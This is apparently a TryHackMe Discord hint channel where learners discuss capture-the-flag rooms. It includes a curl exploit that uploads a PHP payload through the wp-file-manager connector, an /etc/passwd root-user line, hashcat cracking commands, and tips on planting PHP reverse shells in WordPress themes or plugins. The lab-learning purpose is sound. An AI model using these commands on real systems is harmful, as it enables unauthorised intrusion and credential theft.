#room-hints
I was doing a room a few days ago that had a website about trading in vim. Made me actually laugh out loud.
🤣
@led https://tryhackme.com/room/owasptop10 task 25
@median reef @led I figure I could do it like this
Using curl
curl -ks --max-time 5 --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@//tmp/mypoc.php" "http://127.0.0.1/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
yeah you can convert it to python also
that is what i did
Nice
@median reef In the video I'm going to make for badbyte I'm going to show three ways of uploading the payload: I'm gonna show the Metasploit way, your script and how to do it manually. I'll give you credit for your script
❤️
who will you give the room credit to 🤣
electronforce and Raccooninja
i know
I GOTT ITTT, dude that room took me 5 hours
hey guys what's up? could you help me? I got stuck on task 4 from Network Services 2. As you can see I got the bash executable in my ssh, but when I try to execute it, it doesn't show me any flag. Could you help with a hint or something?
these are the permissions that I have
but then what does this mean?
I used chmod +s for that
Luis what are the permissions?
-rwsr-sr-x
Like Ninja said it needs to be owned by root
sudo chown root. bash
Chmod changes permissions
Chown changes the owner
oooooooh
Chgrp changes the group
man but here it says chmod
Task2 states to run
sudo chown root bash
ooooh yeah i got it
Prior to running the chmod command
Ninja is correct....
I was trying to let Luis discover that....
You'll need to look around for the flag.
I rooted the badboy box
I'll try with this
I have two questions about badbyte: what is the CVE for the directory traversal (I can't find it), and the curl command "curl -ks --max-time 5 --user-agent ..." is not working and I do not understand why. A little hint would be welcome
Hello everyone! Hope u r doing great...!
I need help with a Nmap Question... I was doing EVERYTHING the task says but i'm not getting the answer (i think :v)
Command...
Response (1/2)
response(2/2)
and... Sad face. :'v
man it says cappucino i guess that should say root
Hmmm.. D:
now?
Hmmm... So it took me too long to get to that question... Hehe. Thanks, NinjaJc01 | James!
help please
yeah I did it after several tries hahaha thanks
In CC Pentesting Task 10 I keep getting no session created. I've checked my IP several times. I'm using OpenVPN and a Parrot VM
LHOST?
That's what I was thinking i'm trying to grab a screen shot
I can't seem to post a screenshot
!docs verify
Follow those steps
Ok i thought it was the VM IP
hey guys I am solving ARcHanG3l. I found the other hostname and also the test page but I couldn't proceed forward. Tried a lot but couldn't find the LFI. Anyone wanna give a nudge?
I am also trying for hours now. Tried different wordlists, tried manually, but I am about to give up now

man I will refer to the writeup now
It is meant to be an easy room.
I need to level up seriously
lol why is someone deleting my comment
need some help on foothold for broker please
Hi guys, I'm currently doing the Buffer Overflow Room. On task 8 I'm trying to pass the output of a python program as an argument to the binary I'm exploiting, but I receive this error. Does anyone have a hint to solve this issue?
Use Burp to get a web shell into the machine. The Metasploit module for that exploit isn't working
There are PoCs on GitHub similar to Metasploit that work
need to specify the version of mqtt running
The version of the software/website is old... I'm sure you can find a CVE
@modest swift ty!
Just finished BadByte room. What a lovely challenge that was. Excellent work of electronforce & Raccooninja. Bit on the end of easy, I guess.
Yeah true
probably bc it was guided
it was tagged as easy
But was fun learning new things about dynamic port forwarding
definitely
Love the way the passwords were hidden!!
True
Btw it's #room-hints we are chatting in
I hurt my eyes looking through the || auth.log since the user was in the adm group lol ||
hahaha, I think I got it a bit simpler. But it took a while before my fried brain cooled down enough to see it.
Oh no spoilers please man
Noice
yw buddy<3
Keep 'em coming, mate. You 2 are a good team.....could apply for a job as torturers!
theres a rumor about ||another room||
I'm in before you open the door to it! Write me up.
gotta love all the love;) <3
You guys deserve it!
Truly deserving person, right Ween
currently working on badbyte, I have managed to gain access through a CVE and now having some trouble searching for credentials. what are some common directories that you all have seen in a *nix host to be of interests for things like that?
other than config files and logs and whatever may be in their home directories
look into home directory there might be a hint
@median reef damn totally missed that one lol thanks!

that was a fun box
Linux Fundamentals Part 1: I can only find the login credentials in the video and not on the page. Is there a reason behind this?
Because you don't need to SSH in, as there is in-browser access.
You're taught SSH in Linux2
ahh ok thanks, i connected through ssh with the credentials from the video, makes sense to me, thanks for your help!
guys can someone help me in this room
https://tryhackme.com/room/badbyte
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
@stuck fractal ok
i am in room
Badbyte
and in Port Forwarding i connected by ssh and forwarded port 80 to 8080 using this command: ssh -i id_rsa -L 8080:127.0.0.1:80 ...
but i dont know this question: What main TCP ports are listening on localhost?
@stuck fractal .
agh idk why its not working when i type in the pinguftw password
it worked yesterday
it just seems like today it isnt working
i did ssh shiba2@(my machine's ip)
that worked
except the password part
Where did you get the IP from?
Could use a hint on Badbyte on the last section. Hunting for the old password.
Found it! Fun box, thanks to the creators of it. Had me stumped there for a second.
hey guys, I am looking for a hint on what can be wrong in the Common Linux Privesc room for "Exploiting Writeable /etc/passwd". I still get Authentication failure when trying to log in with the new user. The new user line looks ok: new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash in /etc/passwd, while it passed in the task. Edited as user7, which has root rights to this file.
escaping $: new:\$1\$new\$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Honestly I'd use single quotes because it's easier to read
my failure, wrong password 
Can we ask hints for Tokyo Ghoul yet?
guys can someone give me a hint about H1:Medium koth machine?
Do not provide or ask for help or hints for the Tokyo Ghoul room until 17th March, 7pm (GMT)
hey did anyone else have an issue with nmap running the script for finding the vulnerable plugins on badbyte
is the embargo on broker over with yet?
Yep
ok thanks. I need a nudge: I have an MQTT client running and I've subscribed to the topic, but I'm not finding any info on how to retrieve the conversation from the broker. What should I be googling to find the command I need to use?
Are you using MQTTfx?
no I'm trying to use Eclipse Mosquitto
Research what wildcard can be used to subscribe to all topics in the broker.
i already subscribed, i'm trying to find the command to retrieve the conversations on the broker
Search a writeup and see what they use and how
I don't remember the client I've used but I remember that there were 5 messages looped
This channel is not for recommending that people read writeups
This channel is for hints, before looking at writeups.
Then mqttfx is the way
That should be in the documentation for mosquitto. I used MQTTfx.
there is not any write ups yet but thanks any way
i downloaded MQTTfx but not finding how to set it up to connect to the broker
You got the IP and port. The rest is fairly straightforward to figure out.
I had issues getting anything out of MQTT and ended up using Google Chrome App MQTTlens https://chrome.google.com/webstore/detail/mqttlens/hemojaaeigabkbcookmlgmdigohjobjm?hl=en
That's what I used as well.
Look dms theres
thanks, i figured it out. All that trouble to answer just one question, uggggg
Hi I am in introductory networking and have downloaded task files for Task 5. I haven't used Wireshark before and am having trouble loading these files. Any help appreciated.
What do you mean? Do you have wireshark installed?
Ok, so you need to get the files on the attackbox
Or download wireshark on your own machine
Yeah need to get them on attackbox
I have them on my machine and now need them on the box
Ty @stuck fractal I got the CC Pentesting Task 10 completed. I had to use the attack box on the TryHackMe site. I couldn't get a shell with my Parrot VM. I could never get a LHOST address that worked.
I use OpenVPN on my host and a Parrot VM. I tried ifconfig on both but neither of the IP addresses would work. The TryHackMe VPN IP I got started with 10. but I couldn't get it yet.
You need to run it in the VM, not the host
I mean you can run it on the host but then you need to port forward for the reverse shell port
And every other port you want to use.
Just run the VPN in the VM.
ok i'll run the VPN on the VM. I guess the 172. address on the VM is just going to the host. I just started using VMPlayer
"I guess the 172. address on the VM is just going to the host" That doesn't make much sense. The 172.16.x.x IP is probably from a NAT network in VMware.
VMware doesn't connect directly to the internet, does it? I was thinking it had to go through the host OS to connect.
It can be bridged to the network, but that isn't what I said
For BadByte, are there any additional hints aside from "basic linux enumeration" for finding the users' old password?
Make sure you thoroughly review everything in the user's home directory.
ah i found it. thanks @short fox !
what issues?
whenever i used nmap --script http-wordpress-enum.nse --script-args search-limit=1500 -p 8080 127.0.0.1 -oA nmap/wpscanplugin it would take forever to scan, but when i use nmap --script http-wordpress-enum.nse -p8080 127.0.0.1 -oA nmap/wpscanplugin it works fast
do you get the same results?
I did a wp script scan last night and it took a good 30 minutes to finish even with the script args
yeah i got the same results
by default the nmap scans less plugins
1500 is more than the default so it can take a long time
try using the attackbox if your network connection is slow
it will help reduce the scan time
can i ask for the hints for the room hacked
i dont see any writeups options there
Try harder
i am trying but wireshark looks scary to me, but anyways i'll find something
Not what I meant but ok
you meant not to search for writeups and try harder
i guess
i don't think he will give this advice
yes that's what i meant when i said i'll find something
I need some help with privilege escalation to root in archangel. I found the binary and also analysed it with Ghidra. I have an idea but don't know how to implement it. Anyone wanna help?
How long does it take for a writeup to get verified?
Depends on the room, creator, room age, write-up content etc.
Nobody can give an exact date.
Hey guys, could anyone give me a little hint? I am stuck at question 16 from the Investigating Windows 3.0. The question is 'This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)' Thanks!
Did you execute the binary on the victim machine itself? That way you could get an idea of what the binary does
wut
i executed it but had to refer to the writeup. Didn't think about PATH var manipulation.
First thing is the two answers are the wrong way round from the question, so the framework is the second word. It's a well known tool which you should be able to identify with a bit of google. The variable refers to a value the attacker would have been asked to set when launching the attack, so you have to look at how the tool works (bit of an odd question since, as it says the attacker left it on the default setting but there you go)
ah okay! This will help me a lot, Thank you very much!
hey guys could u help me here? task 6 from the Metasploit room
What do you see when you run ps?
i use the ps command but it doesn't show me any spool process
You do not have a shell on the target
you need to run ps in a meterpreter
Because currently it's running ps on your local machine
On your kali.
man but i did everything from task 5
Doesn't matter, if it didn't work then it won't work
But how do I know what I did wrong?
You don't. That's why you ask for help.
hey, I'm on Skynet, got the user's password for the smb share but it's as if it's not correct, I can't manage to log in
is there something else I'm missing here
!docs verify
Follow those instructions, screenshot what you're doing
how can i open information.txt file
Read up about smbclient
i keep getting this message, any other hints??
anything else to use besides the escape character ""
Can anyone help me out with the last question of Task 6 of "REmux The Tmux"? I have been stuck on this question for the last few hours.
The question is: "How can you run the desired plugin after loading it?"
Thanks.
Room badbyte
I am stuck on finding a CVE for RCE
Did nikto, wpscan, nmap
searched manually for it by wordpress version
still no clue what is the CVE
Can anybody help
Did you run the expanded nmap search like it says in the room hint? If not do that.
like with -vv ?
Otherwise i really don't know what an expanded nmap scan is
Ok there's an nmap script you can use to enumerate wordpress. You need to find that and run it, but with the search parameter set to 1500 plugins instead of the default 100.
@candid nimbus oh damn i totally missed that even wondered what that parameter meant
thanks
found it finally 
๐ good job!
you can also try an aggressive plugin search with wp-scan but it takes a bit longer
nmap is probably better tbf
Hello all, need some help. I am stuck in Pentest Task 2 Nmap. At the end there are around 4 questions whose answers I could not find on the nmap chart and not even on Google.
Can you please help me out ?
Question : How many ports are open on the machine?
you need to scan the machine using nmap
check how many open ports from the scan results
I told the same in #room-help don't double post your question
Thank you Nick and Auger sir, i am doing it right now. Sorry, as a new member i did not know where to post the question.
Hey, maybe someone has an idea why I can't see files downloaded with smb in my download folder:
server running in Downloads folder, but there is no subfolder kali
You're in Kali.
They aren't the same filesystem
It's a VM. It has its own filesystem.
Wait where are you looking?
I am expecting files in /home/kali/Downloads/kali
aaaaa... thanks
So this isn't a specific room question, more of a generic rookie question. I've modified the php-reverse-shell.php with my tun0 IP and my listening port, and started nc -lvnp on that port. I upload the shell file to the ftp server, but it's not retaining the chmod I set it to before uploading (for a test, I tried chmod 777 before uploading, but it only has -rw--------- on the ftp server). When I open that page in the browser, nothing seems to happen, and my nc listener never connects. Am I missing something obvious?
on what room
This was in the "h4cked" room. I completed it using a different method, so I don't need a hint for the room, just wondering if I'm missing a step with file permissions (or something else?) for reverse shells in general
when you were looking at the pcap file did you see how the attacker did it?
You can upload your shell and modify its permissions afterwards. Chmod is a valid ftp command.
In that case I don't know, I did the room earlier today and could make it executable. I'm also pretty new at this. You could maybe try with the +x method instead?
I'll have to read up on that, I'm not familiar with it
As a general rule- what permissions need to be set for reverse shells? Does it depend on the type of shell? is read access enough, or is executable required?
it would look like this, you need to put yourself in binary
that must be the missing step. I didn't enter binary mode. I'm not familiar with that in ftp, so I'll have to do some reading
yeah i know, i wasn't familiar with it as well, i had to do some research, the best part of learning
Hence my name :). I've got a lot to learn
chmod should be done on the uploaded file remotely in ftp, not locally. Also the key right is likely read for all - since www-data must see it. Binary mode should not matter since it is a php file - so text. But maybe you fixed all this already.
don't remember having to chmod the file
https://tryhackme.com/room/vulnversity
In this room in Task 4 I have to use Burp to capture the request and then fuzz the file formats. Even though I am using the formats specified in the task for fuzzing, each of them is showing up as "Extension not supported". Then I checked the solution and found that the allowed extension is .phtml. When I try that manually I can see that a file of that extension is allowed, but with Burp it's showing "Not allowed"
Any idea what I could be doing wrong? Or is this a bug?
When I try to fuzz using Repeater it seems to work, but with Intruder it seems to fail
Check the payload encoding
You don't want burp to encode the fullstop
Ohh okay I will try that
how much time does a machine take to scan?
well, using rustscan for me lately it's been very fast
Depends on the machine and scan type
but yeah there are heaps of different types of 'scans' if you are nmapping all ports with default scripts it can take like 30-40 minutes
(maybe longer)
For Inferno room, I can read here that the auto logout is intended behaviour. Is there a hint on how to go about this?
try another shell
Hi!
Can someone help me out with
Hash: e5d8870e5bdd26602cab8dbe07a942c8669e56d6
Salt: tryhackme
I used this:
hashcat -m 110 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme /usr/share/wordlists/rockyou.txt
I don't know if it is ok or not.
output:
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: sha1($pass.$salt)
Hash.Target......: e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme
Time.Started.....: Mon Mar 15 21:43:20 2021 (5 secs)
Time.Estimated...: Mon Mar 15 21:43:25 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3246.5 kH/s (0.30ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Started: Mon Mar 15 21:43:19 2021
Stopped: Mon Mar 15 21:43:26 2021
It's Crack the hash room
If it's exhausted, then you probably need $salt.$pass here
exhausted means it ran through the whole wordlist and couldn't crack it
So either the wordlist doesn't contain the password, or the pass/salt was the other way round in this case
so what will be the command
I think you can work that out yourself.
Hello
don't you need a . between and not a :?
I'm just starting out with linux and I'm doing the challenges.
For the life of me, I cannot find where bob's history is being stored.
history is generally stored in a particular file in the home directory, but it's usually hidden
ls -la
it's a shy file
I figured out that the mode was not right, it should be 160
after -m 160 it works perfectly
oh ok, it was an HMAC
Hi
In the Lian Yu room, i found the directory island/2100 and in this website's source it is written "you can avail your .ticket here" but how?
Can someone help?
I found it. Can someone give me the quick answer: "-la", is that list all?
pretty much
-la is -l and -a
-l is long I think, -a is all
makes sense
Yeah
-l use a long listing format
But i stuck with:
Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.
Salt: aReallyHardSalt
Rounds: 5
@steady stratus u at a PC RN?
Yassss whattup?
Doing a bit of AWS stuff so I can get to w/e in a few mins
On crack the hash, on that question, the number of rounds is wrong
what exactly is the problem?
did you find the ticket?
But im still on the Web
Gobuster
why not try that with the ticket?
good hunting
What is the correct round
?
The default.
according to hashid it is sha512crypt
and according to the page https://hashcat.net/wiki/doku.php?id=example_hashes sha512crypt (1800) does not take any salt in the example template
so should i add salt or not
.
I would just like a hint if possible. I'm looking for where cron jobs are created. I see the location of where it's listed, not sure if it's the same place as it's being created
It is salted.
Sha512 is salted out of the box
You just do not need to specify the salt separately because it is a part of the hash
I used
hashcat -a 0 -m 1800 '$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.' /usr/share/wordlists/rockyou.txt
is it ok
Did it work?
Stop asking if it's ok. If it worked, then it's OK. If it didn't work, then it's not OK.
This is a lab/learning environment
It's running .....
Try things.
for the last 30 min it's running
are you running hashcat in the VM?
rookie question- I did an:
echo "$6$Tb/eum.......hash chars" > hash.txt
when I cat or subl that file, the $6$Tb/ is stripped off. Why is that? Those aren't escape chars, right?
$ is a special character
Used to access variables
VM
yeah that'll take a while as hashcat really likes GPUs
I think that's why it is slow
ah, I hadn't tried single quotes, or considered the vars injection. Thanks.
run hashcat from the host, or use john in the VM
people say good things about collabcat
it took me 25 seconds with a GPU so...
Thanks for the Advice!!
it's pretty deep in the wordlist
14344385
yeah it's around the 3M mark
yeah
Sorry to be a pest, did anyone get a chance to glance at my question?
I'll take a look in a couple of mins (:
ask question instead of asking question about question
Do you know what the rounds should be by any curiosity? I'll take a look into it but I'm lazy w/ other things kekw
I did ask a question the first time.
🤣
Didn't want to spam the chat...
I think led (and I don't want to speak on their behalf) was aiming at asking you to provide a link to the question that you asked
Appreciate you don't want to spam the chat -- but it's fast flowing in here and things get buried quick
I would just like a hint if possible. I'm looking for where cron jobs are created. I see the location of where it's listed, not sure if it's the same place as it's being created
If you state your problem clearly, you will probably get the fastest response.
People aren't ignored intentionally
The bare minimum of information you should give us when you're asking a question here is room, task, and question
Crontabs are stored in a directory by the user that creates them
I believe it's the same place as when you are creating them / writing them but as something like a .tmp
thanks.
Ah, they're not in the same directory
but when writing they're stored temporarily
then when you save it, it'll be stored in the correct directory depending on the user you created it as
i.e. crontabs created as root will be stored separately to that created as say "cmnatic"
there's also the crontab in /etc
That's where I'm currently at and I don't see the flag, so I'll check the other location.
flag probably won't be there directly
which room/task/question is this for?
We ask that you help us a bit so we can better help you
linux challenges flag 4
Flag 4 is located where cron jobs are created.
Thanks I'll list it the proper way, again, this is literally my first day using the discord
Hello i am trying to do LinuxAgency, i cannot solve the question: What can you find on this service? I've rooted the machine and can prove it but it really bothers me that it shows that i have not completed the room
are you sure that's the right room?
it's likely in /etc/crontab
Yep, in task 2, i really can't figure out what it is asking for. I've tried all sorts of answers
ah, haven't done that one yet, sorry
@pine reef if that's the question I think it is, it's a badly worded question
I don't know exactly what question you're asking about, but it might be the one that's actually asking 'what tool do you use to interact with this service'
Is it 6 characters?
I think the question is quite clear. What can you find on that service? Considering what service is running ..... ?
BTW, it is Q 5 of task 2.
Yeah
I'll take another look at it
Well you can find mails on that service, i am pretty sure that is the answer but it is not correct
Yep, and now think a little bit more and you're there.
Completed it, wth...
I am not even going to turn off my instance because i am so mad
🤣
guys i'm stuck at golden eye room
i'm in the website as admin but i can't get a reverse shell
how can i do that?
I haven't done that room, and I'm a rookie here myself. Are you able to upload files to a web server?
i can upload files so i tried to upload a rev shell but once i click it
it starts downloading the file
what's the file type? is this on a linux or windows machine? when you say 'click it', what program/window are you clicking in?
You looked at other services running on the box? Can you access anything else with the creds you have?
you need to go to the page for the file
there's no ssh
the password is only valid on the website so i don't think i can access anything else
Yeah. There's no SSH but, there should be some other stuff...
Also.. If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?
bruh i finished the part long ago
i found alot of users || boris natalya xenia doak dr_doak all the way to admin || what should i do next?
Which task are you on? You made it sound like you're still doing Task1?
Take a look into Aspell, the spell checker plugin.
And no, I think I just misunderstood
yup that's what the hint says but i couldn't figure it out
|| what does the path look like... Maybe you can point it towards another program? ||
thx bro i did it
i just have one question
in task 2 question 3 it says what service is running on port 55007 and it's pop3
i tried pop3 \ dovecot \ popt3d but none of these is the right answer
On goldeneye?
It's asking for the program you use to access it.
I realise it shouldn't be
I reported it as a bug.
yup thought so
I can't seem to get the reverse shell working on GoldenEye. not receiving any packets on the port I specified
try a different payload, maybe upload a binary
I am solving the Year of the Rabbit room, but not able to get anything useful yet. NEED some help with initial enumeration. Anyone wanna give me a nudge? Thanks in advance
Take a look with Burp.
so I was actually dumb and didn't change the default spellcheck settings
i think i stuffed around with that for ages, from memory, dont worry
anyone got OpenVAS to install on the attack box? I've tried pulling the docker image but it seems there is not sufficient space.
it's a 7 GB image
copying a link of this: #room-bugs message
the attackbox is getting additional space as tools for the networks get added but aye
I hope this clarifies things a bit better. I'll have a discussion with the owners on balancing the costs between making things accessible & the costs behind it
Obviously we wanna include as many tools as we can on the attackbox but it's not all that sustainable for both performance & costing esp. when things like OpenVAS are 7gb or something like that
no probs, thanks for the clarification
I'm adding more storage space on the next push -- you might find that you can add the image okay
Hi, could someone help me? I'm doing the "Buffer Overflow Prep" room, in OVERFLOW5 when i run the command "!mona findmsp -distance 2400" it doesn't show the EIP offset, i tried to convert the address to obtain the offset with pattern_offset but it failed. In the writeups the command works 😦
Happy St. Patrick's Day Everyone. I'm hoping someone can point me in the right direction here. Working on the Windows10privesc room and I'm getting stuck with Task 11 and dumping out the hashes from the SYSTEM and SAM files I copied onto my Kali Linux VM. The step tells me to use the creddump7.git repository but I'm not able to locate/install python-crypto and in turn not able to run the "python2 creddump7/pwdump.py STSTEM SAM" command. Is there an alternative way for me to dump these hashes?
There's a python3 version, or you can use secretsdump from impacket @earnest plover
Ok, thanks I'll take a look at those.
sorry to reply late but it's a pop3 service which lets me send and receive emails
i think you are talking about question 5 from task 2
but i'm talking about question 3 from the same task
Do not provide or ask for help or hints for the VulnNet room until 20th March, 7pm (GMT)
Currently stuck on looking glass. I would really appreciate a gentle push in the right direction, as i am out of ideas and have basically been staring at the screen for two hours now.
I was able to obtain the user flag.
What I have so far:
||- Tweedledum and Tweedledee users can invoke bash shells under each others UIDs
- Password for humptydumpty can be found in the tweedledum home directory
- There are execution permissions on alice's home directory but no read permissions. I was thinking maybe one could try to bruteforce binaries in there but i dropped that idea
- The only thing that seems to distinguish humptydumpty is the poetry.txt but I cannot make use of it
- no further valuable sudo permissions, crontabs, SUIDs ||
Did you find the file with hex in it?
||you mean the one containing the password for humptydumpty? yes||
Ok, check file permissions. Linpeas should catch something there.
@fierce stratus DM me if you have any questions
god i'm either blind or stupid. i'll try again tomorrow, it's getting late here. thanks for the hint anyways
ooooor you're neither and it's just something that's super easy to miss.
What do you mean?
it listens on 0.0.0.0:8000, running an HTTP server
You then need to GET the file from it
read the pins please
Got a question with the upload vulnerabilities room
Everything is going well but every time I upload something I get a 500 error. Even when I just upload a legit, accepted image it's not accepted and I get a 500 error
Is it broken or is it supposed to be that way?
that one trolled me for a while
lol, sorry, i got something totally different for that question, it's a very old protocol
hmmm what is that port really used for if not for mails?
It's not asking for the port
It's asking for the program you use to interact with it
It's a question that needs fixing
I cant remember how i came up with the answer i did
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
hey has anyone done vulnnet yet
!rule 13
I've done my research, dude
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
Awww, I see, my bad
oh then it's || telnet ||
but you can interact with it using nc too
I think it should be more precise too
Hello, in "Brainstorm" machine, the answer to open ports is higher than the number that I'm getting.. I've checked a write up and he is getting the same port number. Am I missing something?
Hello, in Basic Pentesting the room is asking me what the username is. How can I find it? I just know the usernames' first letters are k and j
You gotta enum more
The question is what is the username
Okay, I'm going to try, thanks
did you find the username
Yeah
Good. Don't be afraid of using the write-ups, remember it's all about learning
Hello, do you know if there is any write-up for the room Investigating Windows 3?
3, is that like 98?
There don't seem to be writeups for them and not sure if the creator will accept them or not
I tested the room, so if you need help lemme know
There is one question regarding the attack framework and the variable used that I didn't get
As per my understanding it is Empire that is used
But I tried many answers, without any woot woot
The questions and answer are the wrong way round.
Will try it asap. Thanks!
Just finished rooting VulnNet, great room
I'm going to be posting a video on YouTube on VulnNet on Monday if the creator is okay with the timeline to post a walkthrough
Hey, newbie here, doing the nmap room. At the practical, I'm asked to do a TCP SYN scan of the first 5000 ports. Doing it with the switches -sS -Pn -p 0-4990 but I still see 0 ports open. Is there something I didn't understand about how to run a TCP SYN scan?
!docs verify
Follow those instructions, then you can send a screenshot
Hey guys, I'm on task 9 from Network Services 2 and I got stuck here because I don't know what the username or password is. Could you help me?
Oh, so the username is root and the password is "password". I thought that was an example lol. Sorry for that question haha
@stuck fractal here it is
Checked your VPN?
Looked like the OpenVPN command worked, but apparently not... gonna try to fix that, thanks
Checked, and I have correctly set up the VPN, but I still have the same output
Hey guys, I'm on task 10 from Network Services 2. I was trying to crack carl's password from the hash but it has taken more than an hour, so I don't know if I did something wrong
you need to specify a wordlist or it will use a default list
incremental ASCII will crack any password, if you have a lifetime to wait for it
I tried my luck this morning with a few answers but I'm still not able to get the correct one. Also stuck with one of the last questions regarding the reg key being queried by the attacker; I tested all the ones I could find in Procmon at 6:07 but no match
https://tryhackme.com/room/kenobi
I have a doubt regarding the Kenobi room. In Task 1 there is a question to find the open ports on the system. I did a scan and got 11 ports open, but the correct answer is 7. Is this a bug or am I doing something wrong?
I guess it's because it is asking a basic nmap scan (without the -p- switch)
Ok. To clarify the name of the variable you are looking for is in the framework you found. The attacker has to set certain values before launching. (In this case they left it on default).
I ended up downloading the file to my computer, running strings on it, then grepping the result. Not the best method, but it worked. It's like finding a needle in a pile of needles
Thanks for the hints guys. Will look into that this evening.
Maybe I will do Empire room first.
probably not a bad idea
I'm trying to do Brainstorm. I've got the file(s) from the host and transferred them to a Windows 7 VM, however it just quits instantly instead of running like I'd expect
I feel like this isn't supposed to be the challenge of the room
You got the .dll file too?
Run that chatserver as administrator and on your machine do "nc {your windows machine IP} 9999"
I did this and it's working fine
@silver otter
I got the dll file too, and when I run it, admin or not, it just quits straight away
re-downloaded it too and same issue hmm
I ran that chatserver file as an administrator
And it works fine for me
Firewall and Windows Defender should be off
Yep, both off. I'll try some more stuff later and maybe try on my main PC lol
Can someone give me one more hint for "OWASP Top 10" task 19?
I looked through all the files, but didn't find anything helpful
@rugged flame You need to do more than look at the files on the box. Search the internet, find the documentation and source code
For what do I need documentation?
You'll know when you read it. ¯\_(ツ)_/¯
can someone help?
Please research your questions before asking.
yep
Also, please state the room and task and question as basic info
It's Blue
... That too
Seeing as we have no idea what the question is asking about without it
It's not
Oops lol, I had a similar question
Read the manuals and do research before asking here please
Any hints for the room Blue? I'm stuck at
[-] 10.10.162.126:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.162.126:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.162.126:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
You should verify with the bot
Then you can post screenshots
Then run show options and screenshot the output
Ok, did you see where I said screenshot?
ok, I'll do it
Room: Upload vulnerabilities
**Task: 9**
"You will need to access the shell directly using its URI." What does this mean? Should I use the full file path?
Yes, it does.
You need to access the file directly.
Just like in Linux when running a binary you type ./path/to/binary.extension
But it's either asking to download or open the file
Hm, did you follow the instructions correctly?
I did
Would you be able to provide a screenshot that includes the pop-up please:)
Can you tell me if this is correct? I've uploaded the file evil.php5 and the path will be ||http://magic.uploadvulns.thm/graphics/evil.php5||, right?
Has anyone done Tokyo Ghoul?
Just want to discuss privesc
I've done it
But I really enjoyed it, want to see alternate methods
Sure you can dm me about it
Hmm
I don't have any notes on this room and there are no write-ups.
Please make sure the file extension is correct and you are navigating to the correct URI.
Not only that but it says that the script is a php script, in the room magic seems to be magic bytes, if I am not mistaken.
Make sure the magic bytes are correctly setup on the file.
I got it
I mean, my payload is working. The mistake is, I've used ||4 characters (AAAA)|| instead of ||6 (AAAAAA)||
@trim haven thank you
No problemo
There's a talk on the subject by Mark Baggett at Kringlecon 2018 on YouTube. No idea how many of his methods work on this, but if you're interested it's worth a few minutes of your time
https://www.youtube.com/watch?v=ZVx2Sxl3B9c - thanks, got it!
I've had a little SSTI exploitation experience, in Flask/Jinja specifically
so that helped a little, but thanks
oh sure, lemme know if you want a pointer when you get back to it
I am trying to root the Bad Byte room and am stuck at finding the user's password. I tried enumerating for config files, history, linpeas, linenum, then the opt dir or backup dir, but I am not able to figure it out. Any hint will be appreciated...
I am doing Tokyo Ghoul, but after logging in as anonymous on the FTP server I am not able to get the second file from the need help dir
I suppose Talk_with_me is a dir
Ohh sorry, lemme try again
thanks for your help
Did you visit port 21, where you are getting something interesting?
yes
Did you go through that?
Yes, I got a link which led me to the ImageTragick vuln
That's it, apply the steps to go further with the vuln
Yeah, done. I applied it and created the file testv.png and I'm trying to upload it, but it's not getting uploaded
I tried a normal PNG, that's also not getting uploaded
Try uploading an image file that starts with the png extension and see what happens
If you want you can DM me the screenshot
Sure, lemme do it
Ok go for it
Introductory Networking/traceroute. When I enter traceroute into the AttackBox it says traceroute command not found. Help
Hi guys. I am solving Startup. I got the initial foothold on the box and also found a pcap file. But I'm not very good with Wireshark. Am I heading the correct way?
Hello, how can I find the path of that 404.php file?
page.thm/somethingrandom?
For WordPress I suggest taking an actual page that is on the site and adding a random letter to the URI
I found it by navigating through the themes path; however, I didn't know that trick, I will try it next time. Thank you
have you got a blog post on that?
My go-to is creating/editing a plugin which is malicious
that usually works
Nope
Just add a PHP rev shell into 404 and you're good
Good
